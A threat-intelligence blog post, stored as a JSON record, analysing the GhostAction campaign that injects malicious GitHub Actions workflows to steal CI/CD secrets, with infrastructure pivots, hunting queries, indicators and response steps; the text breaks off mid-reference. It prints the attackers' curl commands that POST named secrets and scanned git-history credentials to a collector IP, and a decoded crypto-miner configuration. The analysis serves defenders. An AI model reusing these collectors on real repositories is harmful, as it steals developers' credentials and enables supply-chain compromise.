{"slug": "ghostaction-attack-escalates-by-targeting-github-users", "title": "GhostAction Attack Escalates By Targeting GitHub Users", "summary": "OpenSourceMalware identified a new escalation of the GhostAction supply-chain campaign, in which attackers compromise GitHub accounts and inject malicious Actions workflows that steal CI/CD secrets, including package-publishing, cloud, GitHub, and AI-service credentials. The newer .github/workflows/security-audit.yml variant scans the full checkout and git history for credential-shaped strings, captures contextual lines around AWS keys, and POSTs the results over unencrypted HTTP to 193.32.204.199/?c=monami. Two newly registered domains, my-gitlab.com on September 22, 2026 and my-github.com on October 9, 2026, may signal a developer-targeting phishing wave, with my-github.com pointing directly to the active GhostAction collector IP.", "body_md": "BLOG\n\n# GhostAction Attack Escalates By Targeting GitHub Users\n\nOSM has identified a new evolution of the GhostAction attack, which targets GitHub users via malicious CI workflow files and worm-like behaviour\n\nBy c0a15726-c5b1-4b0d-85e6-fe15553df9e2 ·\n\nOpenSourceMalware has identified a new stage in the ongoing \"GhostAction\" malicious campaign that GitGuardian originally [identified](https://blog.gitguardian.com/ghostaction-campaign-3-325-secrets-stolen/) in 2025. This latest evolution appears to be an escalation and used two new domains targeting GitHub and GitLab.\n\nThe GhostAction campaign is a continuing supply-chain campaign in which attackers compromise GitHub accounts and inject malicious Actions workflows across every repository those accounts can modify. Triggered by pushes or manual execution, the workflows steal CI/CD secrets—including package-publishing, cloud, GitHub, and AI-service credentials—and exfiltrate them to attacker-controlled infrastructure. Later variants expanded collection by scanning repository contents and complete git history, recovering credentials that developers believed had been deleted. GitGuardian (https://blog.gitguardian.com/ghostaction-github-actions-supply-chain-attack- returns/)\n\nEarlier today [Socket](https://socket.dev/blog/ghostaction-cloud-credentials) and [StepSecurity](https://www.stepsecurity.io/blog/ghostaction-returns) subsequently traced a renewed, highly automated wave to compromised maintainers whose access exposed hundreds of repositories, including prominent projects and long-dormant codebases. Their findings show that GhostAction remains an active account-takeover and credential-theft operation: attackers enumerate all writable repositories, push workflows directly without review, trigger executions, and use stolen publishing or cloud secrets to enable further supply-chain compromise.\n\nThe established GhostAction payload reads specifically named GitHub Actions secrets and sends them to attacker infrastructure. The newer `.github/workflows/security-audit.yml` variant also searches the complete checkout and git history for credential-shaped strings, captures contextual lines surrounding AWS keys, and POSTs the combined results over unencrypted HTTP to `193.32.204.199/?c=monami`.\n\nResponders must assume exposure of active Actions secrets and credentials previously committed and later deleted. Removing the workflow does not revoke stolen credentials, invalidate the GitHub token used to alter the repository, or address packages, images, releases, and deployments produced during the compromise.\n\n## Early Warning: A Possible New Developer-Targeting Wave\n\nTwo newly registered, code-hosting-themed domains may signal the next phase of developer targeting. `my-gitlab.com` was registered on September 22, 2026, followed 17 days later by `my-github.com`. The domains share the exact `my-<major code-host>.com` construction and the parallel `<brand>.my-<brand>.com` form. `my-github.com` points directly to the active GhostAction collector IP; `gitlab.my-gitlab.com` hosts an apparent GitLab service on separate AWS infrastructure. Common ownership is not yet proven, but the naming, timing, and developer-facing services justify early monitoring for phishing, malicious clone URLs, token theft, CI configuration abuse, and payload delivery.\n\nThe infrastructure suggests a possible shift from conspicuous IP-address collectors toward domains designed to look familiar to developers:\n\n```\nmy-gitlab.com          registered 2026-09-22\n└── gitlab.my-gitlab.com\n\nmy-github.com          registered 2026-10-09\n└── github.my-github.com\n```\n\nThis pattern could support several attacks against developers: GitHub or GitLab credential phishing, OAuth or personal-access-token theft, malicious repository clone instructions, fake API endpoints, poisoned package or release downloads, runner registration, and CI/CD secret collection. These are forecast scenarios derived from the naming and exposed services; they have not all been observed.\n\n`my-github.com` is the higher-confidence indicator because it resolves directly to `193.32.204.199`, the current GhostAction exfiltration and scanning host. It also has wildcard DNS, allowing whoever controls the domain to use convincing hostnames without publishing individual records. `my-gitlab.com` is a lower-confidence watchlist domain: its configured `gitlab.my-gitlab.com` hostname resolves to an AWS EC2 address in Hong Kong where passive Shodan data identifies GitLab and nginx on ports 80 and 443.\n\nThe pair is not technically attributed to one operator. They use different registrars, registrant records, Cloudflare nameserver pairs, IP addresses, ASNs, and DNS designs, and no shared certificate or account artifact has been recovered. Defenders should nevertheless hunt and monitor both domains now because waiting for confirmed victim telemetry would forfeit the value of the early warning.\n\nRecommended monitoring:\n\n- DNS, proxy, browser, email, and endpoint events containing either apex domain or any subdomain;\n- Git remotes, package metadata, documentation, workflow files, and shell history referencing either domain;\n- authentication pages, OAuth redirects, personal-access-token prompts, runner-registration instructions, and clone URLs using the domains;\n- outbound connections from developer workstations, CI runners, build systems, and package-publishing hosts;\n- future DNS, certificate, hosting, and repository changes that create a direct link between the two domains.\n\n## Threat Overview\n\nAttribute\n\nValue\n\nThreat\n\nGhostAction\n\nType\n\nCI/CD credential theft and software supply-chain intrusion\n\nPlatform\n\nGitHub and GitHub Actions\n\nSeverity\n\nCritical where workflows can access publishing, cloud, or deployment secrets\n\nFirst documented\n\nSeptember 2025\n\nCurrent endpoint\n\n`193.32.204.199` over HTTP\n\nFiles\n\n`github_actions_security.yml`, `security-check.yml`, `security-audit.yml`\n\nTriggers\n\n`push`, `workflow_dispatch`\n\n## Discovery\n\nThe investigation began with `claudecord`. PyPI version `0.3.2` contains `.github/workflows/github_actions_security.yml`, which POSTs named deployment, npm, and PyPI secrets to `http://193.32.204.199`. Its SHA-256 is:\n\n```\n7fbd40446a82c77b23432c6ab73bd8595c98e90e4f4a473198b4d1256f3e8c4b\n```\n\nThe claimed upstream, `kanavdhanda/claudeCord`, shows the initial implant in commit `a69f8c4`, followed two seconds later by `Trigger security scan`. Commit `dd08e03` added `.github/workflows/security-audit.yml` the next day. Commit `7e03c5a` later removed the remaining malicious workflow.\n\nGitGuardian reported 772 affected repositories between August 31 and September 30. OpenSourceMalware can currently recover 717 through that cutoff and 790 through October 9. Repositories and commits may disappear after disclosure, while injections continued after GitGuardian’s window; the present dataset is therefore a reproducible public lower bound.\n\n### October 8 Mass Injection\n\nSocket and StepSecurity resolved the newest activity to two compressed sweeps:\n\nUTC window\n\nCompromised account\n\nRepositories\n\nDetail\n\n13:20–13:44\n\n`kitao`\n\n27\n\n`kitao/pyxel` received one add and two update commits\n\n21:10–21:26\n\n`henrywoo`\n\n318\n\n39 source repositories, 279 forks, plus `uber/athenadriver`\n\n**Total**\n\n**2 accounts**\n\n**346**\n\nAutomated enumeration of writable repositories\n\nThe sweep included active projects and repositories dormant for roughly a decade, supporting automated enumeration rather than project selection. `kitao/pyxel` had approximately 18,420 stars at Socket’s collection time. The Uber-owned `uber/athenadriver` repository was reachable because its original author retained write access after the project moved under the Uber organization.\n\nThe `athenadriver` injection went directly to `master` without a pull request or review and used the legitimate maintainer identity as author and committer. StepSecurity reports that the commit was unsigned. Author identity therefore provides weak detection when a valid credential is abused; content, review state, burst timing, push path, and runner egress are stronger signals.\n\nSocket observed successful executions and found the workflow still present on default branches it checked on October 9. It had not observed malicious PyPI or [crates.io](http://crates.io) releases attributable to this wave at publication time. That narrows observed impact but does not reduce the need to rotate publishing credentials.\n\n## Infrastructure\n\nPeriod\n\nEndpoint\n\nReported repositories\n\nSeptember 2025\n\n`bold-dhawan.45-139-104-115.plesk.page`\n\n~900 total for the wave\n\nSeptember 2025\n\n`carte-avantage.com`\n\nIncluded above\n\nSeptember 2025\n\n`objective-hopper.45-139-104-115.plesk.page`\n\nIncluded above\n\nOct–Dec 2025; March 2026\n\n`170.39.218.2`\n\n~75\n\nNov 2025; March–April 2026\n\n`*.oast.fun`\n\n~250\n\nAug–Sept 2026\n\n`193.32.204.199`\n\n772 reported\n\nSeptember 2026\n\n`193.32.204.199:3000/api/workflow/receive?inj=<id>`\n\n7\n\nOctober 2026\n\n`193.32.204.199/?c=monami`\n\nUnresolved\n\nStepSecurity places the current IP in honeypot telemetry on September 4, 2026 and in an infected public repository on September 5. Those dates provide an earlier investigation boundary than the major public injection bursts.\n\n### Infrastructure Reuse Beyond GhostAction\n\nDedicated infrastructure research found that `193.32.204.199` is also an active malicious internet scanner. GreyNoise, Shodan, OTX, SCARD, SANS ISC, and [BlockList.de](http://BlockList.de) independently observed scanning, brute-force, web probing, or honeypot traffic. A SANS daily view recorded 11,286 probes to TCP/8080, while SCARD recorded 413 events dominated by suspicious web-scanner user agents. In incident response, distinguish inbound scanning from this IP from outbound GitHub-runner traffic to it; the latter is direct evidence of workflow exfiltration.\n\nThe legacy IP `45.139.104.115` has 389 OTX passive-DNS records spanning a phishing-heavy neighborhood. Recurring themes include Ameli/Carte Vitale, government fines, parcel delivery, Netflix, banking, and SNCF. `carte-avantage.com` was independently reported as an SNCF payment-card phishing site before its 2025 GhostAction use. This establishes multi-purpose malicious use of the infrastructure but does not prove that one operator controlled every co-hosted domain.\n\n#### Current IP ownership and exposure\n\nRIPE RDAP assigns `193.32.204.0/24` to the object `vcyber`, with Vigilant Cyber SAS as the registered organization and `abuse@vigilantcyber.top` as the abuse contact. The prefix is currently announced by AS153622, Madina IT. Commercial geolocation sources variously place the address in Helsinki, Istanbul, or Turkey. These records describe allocation, routing, and database-derived location respectively; none establishes where the GhostAction operator resides.\n\nShodan InternetDB observed OpenSSH 8.9p1 on TCP/22, Apache 2.4.52 on TCP/80, and TCP/8900. URLScan independently recorded `http://193.32.204.199/c/` returning Apache 2.4.52 on Ubuntu. Version-derived CVEs in Shodan are exposure hypotheses and do not prove exploitability.\n\nThe scanning evidence is independent of the GitHub campaign:\n\nSource\n\nObservation\n\nGreyNoise\n\n`noise=true`, `classification=malicious`, last seen October 8\n\nShodan\n\n`scanner` tag\n\nOTX\n\n50 pulses covering HTTP scanning, TCP/8080, brute force, and multi-protocol honeypots\n\n68 attacks across 8 reports\n\nSCARD\n\n413 events; surfaced signature dominated by suspicious web-scanner user agents\n\nSANS ISC\n\n11,286 TCP/8080 probes in a daily top-scanner view\n\nFeed tags such as Mirai, Mozi, WannaCry, or ransomware are not proof that the host ran those malware families. Several OTX pulses are bulk honeypot feeds whose names describe the monitored threat set. The supported finding is that the same IP used for GhostAction exfiltration was generating broad hostile scanning and probing traffic.\n\n#### `my-github.com`: same-day domain on the current collector\n\n`my-github.com` is a new and highly relevant pivot on the active GhostAction IP:\n\nProperty\n\nObservation\n\nRegistered\n\n`2026-10-09T09:50:00Z`\n\nRegistrar\n\nDynadot Inc., IANA ID 472\n\nRegistrant\n\nNot disclosed in public RDAP\n\nExpiration\n\n2027-10-09\n\nNameservers\n\n`kianchau.ns.cloudflare.com`, `selah.ns.cloudflare.com`\n\nCurrent A record\n\n`193.32.204.199`\n\nDNSSEC\n\nNot signed in observed registration data\n\nThe domain was registered on the day this infrastructure was being publicly investigated and uses a name that impersonates or invokes GitHub. It does not use Cloudflare’s reverse proxy in the observed A record; DNS resolves directly to the GhostAction collector. Public scan reporting associated the domain with Vigilant Cyber hosting and observed a valid TLS presentation.\n\nURLScan submitted `https://my-github.com/SDRVuhYw` at 15:48 UTC on October 9. The observed navigation finished at a YouTube Rickroll URL. That behavior may represent operator taunting, a disposable redirect, an unrelated tenant, or researcher activity after disclosure. It is not evidence of credential phishing by itself.\n\nThe timing, brand-related name, and exact A-record overlap make `my-github.com` a high-priority indicator and pivot. There is still no direct workflow, account, registrar, or server-side evidence proving that the GhostAction operator registered it. The report therefore classifies it as **suspicious infrastructure associated by IP, operator attribution unresolved**.\n\nHunt the domain in DNS, proxy, email, certificate, and GitHub content telemetry:\n\n```\nmy-github.com\n*.my-github.com\n\"my-github.com\" path:.github/workflows\n\"193.32.204.199\" \"my-github.com\"\n```\n\nAny outbound GitHub runner connection to `my-github.com` should be investigated as potential campaign adaptation even if the workflow no longer contains the literal IP.\n\nFour reported labels—`ghassets.my-github.com`, `github.my-github.com`, `api.my-github.com`, and `gh.my-github.com`—also resolve to `193.32.204.199`. None currently has an AAAA, CNAME, or TXT record, and no exact public URLScan capture or OTX passive-DNS history was found for them.\n\nRandom control labels also resolve to the same address with the same TTL, confirming wildcard DNS for `*.my-github.com`. The names are semantically consistent with GitHub impersonation, but DNS resolution does not prove they are separately configured services: any invented label resolves. Count the apex as the infrastructure node, retain the four surfaced labels as hunt terms, and require HTTP `Host`, TLS SNI, certificate, email, workflow, or victim telemetry before asserting active use of an individual subdomain.\n\n```\nghassets.my-github.com\ngithub.my-github.com\napi.my-github.com\ngh.my-github.com\n```\n\n#### Related GitLab-themed domain\n\n`my-gitlab.com` was registered on September 22, 2026, 17 days before `my-github.com`. It follows the same `my-<code-host>.com` naming pattern, making it a useful pivot, but current infrastructure does not connect it to GhostAction. It uses Gname rather than Dynadot, has a different Cloudflare nameserver pair, and does not resolve to `193.32.204.199`.\n\nThe apex currently has no address or mail records. The explicitly configured `gitlab.my-gitlab.com` hostname resolves to `18.167.164.26`, an AWS EC2 address in Hong Kong. Shodan InternetDB reports ports 80 and 443 with GitLab and nginx fingerprints, consistent with a functioning self-hosted GitLab service. Random subdomain controls return NXDOMAIN, so this domain does not use the wildcard behavior seen on `my-github.com`. Public URLScan, OTX, search, and Certificate Transparency checks produced no malicious or campaign-specific evidence.\n\nClassify `my-gitlab.com` and `gitlab.my-gitlab.com` as **watchlist indicators: relationship unconfirmed**. Their naming and timing warrant monitoring, but treating them as confirmed GhostAction infrastructure would exceed the evidence. Useful next pivots are workflow references, login or clone URLs in endpoint telemetry, certificate reuse, registrar artifacts, victim reports, and future passive-DNS changes.\n\nThe strongest connection between `my-gitlab.com` and `my-github.com` is the exact `my-<major code-host>.com` naming construction combined with registration 17 days apart. There is also a parallel `<brand>.my-<brand>.com` form: `gitlab.my-gitlab.com` is explicitly configured, while `github.my-github.com` resolves through the GitHub-themed domain’s wildcard. Tests of analogous GitHub, GitLab, API, asset, registry, package, authentication, and login labels under `my-gitlab.com` returned NXDOMAIN except for `gitlab.my-gitlab.com`; the evidence therefore shows a strong lexical pattern, not a mirrored subdomain deployment.\n\nNo operator-specific link was found: the domains use different registrars, privacy/registrant records, Cloudflare nameserver pairs, SOA serials, IP addresses, ASNs, DNS designs, and hosting providers. No shared certificate, passive observation, or relevant indexed co-occurrence was identified. Cloudflare DNS, one-year registration, transfer locks, and disabled DNSSEC are common defaults and carry little attribution weight. The relationship remains a credible hypothesis until a shared token, certificate or key, origin, account, repository reference, payload, or victim-side sequence is recovered.\n\n#### Legacy IP and phishing-platform overlap\n\nARIN assigns `45.139.104.0/24` to 49.3 Networking LLC, and RIPE routing data shows AS399979 announcing it throughout the relevant 2024–2026 period. OTX passive DNS produced 389 records representing 355 normalized names. At minimum, keyword clustering found 68 parcel/postal impersonation names, 29 French health/Ameli/Carte Vitale names, 13 government/fine/tax names, nine Netflix/streaming names, and seven banking/payment/insurance names.\n\nExamples include `dhl-colis-track.com`, `chronopost-tracker.com`, `ameli-remboursement.com`, `fisc-gouv.info`, `netflix-secure-france.com`, `client-axa.info`, and `leetchi-verif.com`. Independent reputation sources classify several neighbors as phishing, spam, possible malware, or sinkholed infrastructure. This establishes phishing-heavy hosting, though shared hosting prevents assigning every name to GhostAction.\n\n`objective-hopper.45-139-104-115.plesk.page` still resolves to the legacy IP. `bold-dhawan.45-139-104-115.plesk.page` currently returns NXDOMAIN. The adjective-surname labels are consistent with automatically generated Plesk preview hostnames and do not reveal a human registrant.\n\n#### `carte-avantage.com`: phishing-to-GhostAction crossover\n\nPublic victim reports describe `sncf.carte-avantage.com` impersonating SNCF Connect and offering a €49 discount card for €2.45. Reports state that the site collected identity and payment-card data while most non-payment navigation was inert. GitGuardian later found `carte-avantage.com` used as a GhostAction exfiltration endpoint.\n\nCurrent RDAP shows a Dynadot registration from August 15, 2025, an undisclosed registrant, and redemption status after expiration in August 2026. The domain currently returns NXDOMAIN. It received Let’s Encrypt certificates immediately after the 2025 registration, resolved to `45.139.104.115` by August 17, and appeared in GhostAction the following month. That sequence strongly ties the **2025 registration instance** to the legacy campaign infrastructure.\n\nArchives and Certificate Transparency show older domain lives in 2018, 2021–2022, and 2024. The 2025 creation date reflects re-registration rather than first-ever use. Consequently, the 2022/2024 SNCF phishing operator and 2025 GhostAction operator cannot be assumed identical without historical WHOIS, registrar-payment, or server-control evidence. Public RDAP does not expose a defensible individual owner.\n\nFull ownership, routing, passive-DNS, certificate, scanning, and attribution analysis is in `ghostaction_infrastructure_2026-10-09.md`.\n\n## Attack Chain\n\n1. **Valid repository access:** the actor uses access associated with the victim identity. Displayed authorship alone cannot distinguish authorized work from token abuse.\n2. **Workflow injection:** a security-themed file is written below`.github/workflows/` .\n3. **Execution:** the injection push can trigger the newly added workflow; later pushes retrigger it, and`workflow_dispatch` permits manual execution.\n4. **Retriggering:** an inert timestamp comment is appended to`README.md` , creating another push.\n5. **Collection:** named Actions secrets are expanded; the new variant also scans current and historical source.\n6. **Exfiltration:**`curl --data-binary` sends a victim-labelled multiline record over HTTP.\n\nGitHub resolves `${{ secrets.NAME }}` before Bash receives the script. Missing secrets become empty strings; existing values become command data. Log masking does not prevent the runner from transmitting the underlying value.\n\n## Payload Evolution\n\n### Targeted-secret workflow\n\nThe PyPI artifact contains the established collector:\n\n```\ncurl -s -X POST -d 'DEPLOY_HOST=${{ secrets.DEPLOY_HOST }}&DEPLOY_SSH_KEY=${{ secrets.DEPLOY_SSH_KEY }}&NPM_TOKEN=${{ secrets.NPM_TOKEN }}&PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' http://193.32.204.199\n```\n\nSecret names vary by victim, indicating that the actor inspected existing workflow or configuration references and generated a tailored collector. It cannot enumerate stored secret values; it references names learned beforehand and relies on Actions expression expansion.\n\n### New `security-audit.yml`\n\nThe latest version combines three collectors:\n\n1. explicit repository-specific Actions secrets;\n2. regex matches in the checked-out tree;\n3. regex matches and contextual lines from all reachable git patches.\n\nIt sends results to `http://193.32.204.199/?c=monami`. The query value may label a campaign or collector version; its server-side meaning is unresolved.\n\n### Full-history checkout\n\n```\n- uses: actions/checkout@v4\n  with:\n    fetch-depth: 0\n```\n\n`fetch-depth: 0` obtains complete reachable history instead of a shallow checkout. Credentials deleted from the visible branch remain available to `git log -p --all`. The setting is legitimate by itself and becomes high-risk when correlated with secret regexes and an unrelated external POST.\n\n### Victim identity and direct secrets\n\n```\nout=\"REPO=$GITHUB_REPOSITORY\"\n[ -n \"CARGO_REGISTRY_TOKEN=${{ secrets.CARGO_REGISTRY_TOKEN }}&PERSONAL_ACCESS_TOKEN=${{ secrets.PERSONAL_ACCESS_TOKEN }}&PYPI_PASSWORD=${{ secrets.PYPI_PASSWORD }}&PYPI_USERNAME=${{ secrets.PYPI_USERNAME }}\" ] && out=\"$out&...\"\n```\n\n`GITHUB_REPOSITORY` identifies the victim. Because literal parameter names remain even when all secrets are empty, the `-n` condition is always true. The example targets Rust and Python publishing plus a general access token; observed lists also include cloud, container, SSH, database, bot, npm, PyPI, and GitHub credentials.\n\n### Current-tree collection\n\n```\ngrepped=$(grep -rEiho \"...\" --exclude-dir=.git . 2>/dev/null | sort -u)\n```\n\n`-r` scans recursively, `-E` enables extended regexes, `-i` ignores case, `-h` removes filenames, and `-o` returns only matches. Errors are hidden and results deduplicated. Targeted families include:\n\nPattern\n\nCredential\n\n`AKIA...`, `ASIA...`\n\nAWS long-term and STS access-key IDs\n\n`sk-ant-...`\n\nAnthropic\n\n`sk-proj-...`\n\nOpenAI project key\n\n`sk-or-...`\n\nOpenRouter\n\n`ghp_...`, `github_pat_...`\n\nGitHub PATs\n\n`glpat-...`\n\nGitLab PAT\n\n`AIza...`\n\nGoogle API key\n\n`xox[baprs]-...`\n\nSlack token\n\n`SG.<part>.<part>`\n\nSendGrid key\n\n`secret_access_key...`\n\nAWS secret access key assignment\n\n`aws_session_token...`\n\nAWS session-token assignment\n\nThe regex uses PCRE non-capturing groups such as `(?:v1-)?` with `grep -E`, which implements POSIX ERE. Behavior may vary and produce warnings or missed matches; `2>/dev/null` hides failures. This defect reduces reliability but does not neutralize ordinary ERE branches.\n\n### Git-history collection\n\n```\ngl=$(git log -p --all 2>/dev/null | head -200000)\nhist=$(echo \"$gl\" | grep -oiE \"...\" | sort -u | head -300)\n```\n\n`git log -p --all` emits metadata and diffs for every reachable reference. The actor retains up to 200,000 output lines and 300 unique matches. Deleted lines are included, so credentials removed from current source can still be collected. Large repositories bias toward recent history because git normally walks newest commits first.\n\n### AWS context collection\n\n```\nctx=$(grep -rEi -B2 -A2 \"AKIA...|ASIA...\" --exclude-dir=.git . 2>/dev/null | head -150)\nhctx=$(echo \"$gl\" | grep -Ei -B2 -A2 \"AKIA...|ASIA...\" | head -150)\n```\n\nThese commands collect two surrounding lines rather than only the key ID. Context may disclose the paired secret key, region, role, account, bucket, hostname, username, or other credentials. Current and historical context are each capped at 150 lines and wrapped with distinctive `AKIA_CTX_START` and `AKIA_CTX_END` markers.\n\n### Exfiltration\n\n```\ncurl -s -m 20 -X POST --data-binary \"$full\" \"http://193.32.204.199/?c=monami\" || true\n```\n\n`--data-binary` preserves newlines. The body contains repository identity, named secrets, AWS context, current matches, and historical matches. Plain HTTP exposes stolen data in transit. `-s` suppresses output, `-m 20` limits delay, and `|| true` prevents a failed POST from failing the step. The final non-empty check is always satisfied because the body begins with the repository name, so every run sends at least a victim beacon.\n\n## GitHub Hunting Queries\n\n### High-confidence infrastructure searches\n\nThe most effective primary search quotes the IP and scopes the result set to executable GitHub Actions workflow paths, independent of filename:\n\n```\n\"193.32.204.199\" path:.github/workflows\nhttps://github.com/search?q=%22193.32.204.199%22+path%3A.github%2Fworkflows&type=code\n```\n\nThis query detects `github_actions_security.yml`, `security-check.yml`, `security-audit.yml`, and renamed copies in one pass. Quoting the IP requires the complete literal indicator, while the path constraint removes documentation, IOC feeds, issue templates, and non-executable source files that mention the campaign. Results still require content review because defenders may intentionally commit detections or blocked indicators inside workflow files.\n\nUse the following searches as broader discovery and filename-specific pivots:\n\n```\n193.32.204.199 language:YAML\npath:github_actions_security.yml 193.32.204.199\npath:security-audit.yml 193.32.204.199\npath:security-check.yml \"193.32.204.199:3000/api/workflow/receive\"\n```\n\n### Version-specific payload searches\n\n```\npath:.github/workflows \"AKIA_CTX_START\" \"git log -p --all\"\npath:.github/workflows \"AKIA_CTX_END\" \"--data-binary\"\npath:security-audit.yml \"?c=monami\"\npath:.github/workflows \"head -200000\" \"head -300\" \"git log -p --all\"\npath:.github/workflows \"aws_session_token\" \"fetch-depth: 0\" \"--data-binary\"\npath:.github/workflows/github_actions_security.yml \"Prepare Cache Busting\" \"send-secrets\"\n```\n\n### Historical infrastructure\n\n```\npath:.github/workflows \"bold-dhawan.45-139-104-115.plesk.page\"\npath:.github/workflows \"objective-hopper.45-139-104-115.plesk.page\"\npath:.github/workflows \"carte-avantage.com\"\npath:.github/workflows \"170.39.218.2\"\npath:.github/workflows \"oast.fun\" \"send-secrets\"\n```\n\n### Commit history\n\n```\n\"Add Github Actions Security workflow\"\n\"Update Github Actions Security workflow\"\n\"Add security check workflow\"\n\"Add security audit workflow\"\n\"Update security audit workflow\"\n\"Trigger security scan\"\n```\n\nPhrase search also returns longer messages and bodies. Fetch the file at each returned SHA and verify infrastructure or a distinctive content marker before assigning it to the campaign.\n\nDetection\n\nConfidence\n\nGuidance\n\nKnown IP plus malicious workflow path\n\nVery high\n\nDirect campaign correlation\n\n`AKIA_CTX_START` plus `git log -p --all`\n\nVery high\n\nDistinctive latest collector\n\n`?c=monami` plus `--data-binary`\n\nVery high\n\nVersion-specific route\n\nExact commit message alone\n\nMedium\n\nValidate file at SHA\n\n`fetch-depth: 0` plus secret regexes\n\nLow–medium\n\nLegitimate scanners do this\n\n`security-audit.yml` filename alone\n\nLow\n\nCommon legitimate filename\n\n### October 8 Account and Repository Pivots\n\n```\nuser:henrywoo path:.github/workflows/security-audit.yml\nuser:kitao path:.github/workflows/security-audit.yml\nrepo:uber/athenadriver path:.github/workflows/security-audit.yml\nrepo:kitao/pyxel path:.github/workflows/security-audit.yml\n```\n\nTreat fork results separately from source repositories. Socket counted 279 affected forks under `henrywoo`; a committed workflow in a fork becomes an execution risk when Actions is enabled and a qualifying event gives it access to that fork’s secret context.\n\n## Validated Repository Scope\n\nEvidence\n\nRepositories\n\nValidation\n\nAdded main workflow\n\n683\n\nExact message; historical file and IP verified\n\nUpdated main workflow\n\n272\n\nExact message; historical file and IP verified\n\nPort-3000 variant\n\n7\n\nHistorical file and endpoint verified\n\nDeduplicated set\n\n790\n\nUnion of validated evidence\n\nSupporting datasets are `ghostaction_repositories_summary.csv`, `ghostaction_affected_repositories.csv`, and `ghostaction_trigger_commits_sample.csv` beside this report.\n\n## MITRE ATT&CK\n\nTactic\n\nTechnique\n\nID\n\nInitial Access\n\nValid Accounts: Cloud Accounts\n\nT1078.004\n\nInitial Access\n\nCompromise Software Supply Chain\n\nT1195.002\n\nExecution\n\nUnix Shell\n\nT1059.004\n\nPersistence\n\nEvent Triggered Execution\n\nT1546\n\nCredential Access\n\nCredentials In Files\n\nT1552.001\n\nCredential Access\n\nPrivate Keys\n\nT1552.004\n\nDiscovery\n\nFile and Directory Discovery\n\nT1083\n\nCollection\n\nData from Local System\n\nT1005\n\nCommand and Control\n\nWeb Protocols\n\nT1071.001\n\nExfiltration\n\nExfiltration Over C2 Channel\n\nT1041\n\nPublic evidence does not establish how the original GitHub credentials were obtained.\n\n## Indicators of Compromise\n\n```\n193.32.204.199\nhttp://193.32.204.199/?c=monami\nhttp://193.32.204.199:3000/api/workflow/receive?inj=<id>\nmy-github.com\n*.my-github.com\nghassets.my-github.com\ngithub.my-github.com\napi.my-github.com\ngh.my-github.com\nhttps://my-github.com/SDRVuhYw\n170.39.218.2\n45.139.104.115\nbold-dhawan.45-139-104-115.plesk.page\nobjective-hopper.45-139-104-115.plesk.page\ncarte-avantage.com\n*.oast.fun\n\n.github/workflows/github_actions_security.yml\n.github/workflows/security-check.yml\n.github/workflows/security-audit.yml\n\nPrepare Cache Busting\nsend-secrets\nAKIA_CTX_START\nAKIA_CTX_END\ngit log -p --all 2>/dev/null | head -200000\ncurl -s -m 20 -X POST --data-binary\n```\n\nFilenames alone are not malicious indicators; correlate them with infrastructure or behavior.\n\n### Related watchlist indicators—not attributed to GhostAction\n\n```\nmy-gitlab.com\ngitlab.my-gitlab.com\n18.167.164.26\n```\n\nThe IP is shared cloud infrastructure and should only be used with the hostname or other corroborating context.\n\n## Separate DevOpsGPT Miner\n\nCommit `614a565` modifies `Dockerfile`, `run.sh`, and two scheduler files to install and persist XMRig as `/usr/local/bin/pyworker`. Static XOR decoding with `devops2024` yields:\n\n```\npool.supportxmr.com:3333\n832eKef1fNRTQdiJeJzsvkMMsogMp22FR2FLX1oaV5BxGfoMcJvkcbFgWgNRyNfsE19D9pdM1zdU7D9kRLdJbM5rU1vjfcL\nworker1\n--cpu-max-threads-hint=30\n--donate-level=0\n```\n\nThe five expected fields are present, differing from GitGuardian’s conclusion that the configuration was truncated. The miner predates GhostAction in this repository and uses different, tailored tradecraft. Treat it as separate activity through a shared compromised identity unless further evidence connects the operators.\n\n## Incident Response\n\n1. Disable Actions temporarily and preserve workflows, run IDs, logs, commits, audit logs, and package/release records.\n2. Revoke GitHub PATs, OAuth grants, App credentials, deploy keys, and sessions associated with the compromised identity.\n3. Remove malicious workflows from executable branches and tags; preserve evidence separately.\n4. Block campaign infrastructure without contacting it.\n5. Rotate every named Actions secret, then search and rotate matching credentials in full git history.\n6. Prioritize source-control, registry, cloud, SSH, deployment, database, and container credentials.\n7. Audit packages, releases, images, and deployments produced during the compromise window.\n8. Rebuild trusted artifacts from a verified pre-compromise commit in a clean environment.\n\nHarden repositories with protected branches, reviewed workflow changes, `.github/workflows/**` ownership rules, least-privilege organization secrets, short-lived credentials, and cloud OIDC. Alert when workflows combine full-history checkout, git-diff scanning, credential regexes, and outbound network clients.\n\nRequire approval for new or modified workflows wherever repository policy permits it. StepSecurity reports that workflow approval was the control observed stopping exfiltration in this wave. Apply runner egress allowlists as a second layer: the collector connects directly to a raw IP on ports 80 or 3000, producing no DNS lookup for domain-only controls to inspect. Historical network telemetry for those destinations can identify the repository, workflow, job, and step that attempted collection.\n\n## Limitations\n\n- Deleted, private, force-pushed, and unindexed repositories are outside the recoverable public set.\n- The prevalence of the newest exact `security-audit.yml` variant remains unresolved because its generic commit message creates substantial noise.\n- Workflow content proves attempted collection, not successful delivery or credential validity.\n- `c=monami` and`inj=<id>` appear to route or label collection; attacker infrastructure was not contacted.\n- Additional malware may exist under unrelated names or commit messages.\n\n## References\n\n- [GitGuardian GhostAction report](https://blog.gitguardian.com/ghostaction-github-actions-supply-chain-attack-returns/)\n- [StepSecurity: GhostAction Returns](https://www.stepsecurity.io/blog/ghostaction-returns)\n- [Socket: New GhostAction Wave Hits Hundreds of Repositories](https://socket.dev/blog/ghostaction-cloud-credentials)\n- [GreyNoise record for](https://viz.greynoise.io/ip/193.32.204.199) `193.32.204.199`\n- [SANS ISC TCP/8080 scanner telemetry](https://isc.sans.edu/data/port/8080)\n- [SCARD suspicious-source telemetry](https://bad.ip.org.au/)\n- [SNCF phishing reports for](https://www.signal-arnaques.com/scam/view/735323) `carte-avantage.com`\n- [Verisign RDAP for](https://rdap.verisign.com/com/v1/domain/carte-avantage.com) `carte-avantage.com`\n- [GitHub: Using secrets in Actions](https://docs.github.com/en/actions/how-tos/write-workflows/choose-what-workflows-do/use-secrets)\n- [MITRE ATT&CK T1195.002](https://attack.mitre.org/techniques/T1195/002/)\n- [MITRE ATT&CK T1552.001](https://attack.mitre.org/techniques/T1552/001/)\n- [GitHub search: IOC in YAML](https://github.com/search?q=193.32.204.199+language%3AYAML&type=code&l=YAML)\n- [GitHub search: quoted IOC under](https://github.com/search?q=%22193.32.204.199%22+path%3A.github%2Fworkflows&type=code) `.github/workflows`\n- [GitHub search: main workflow](https://github.com/search?q=path%3Agithub_actions_security.yml+193.32.204.199&type=code)\n- [GitHub search: new audit 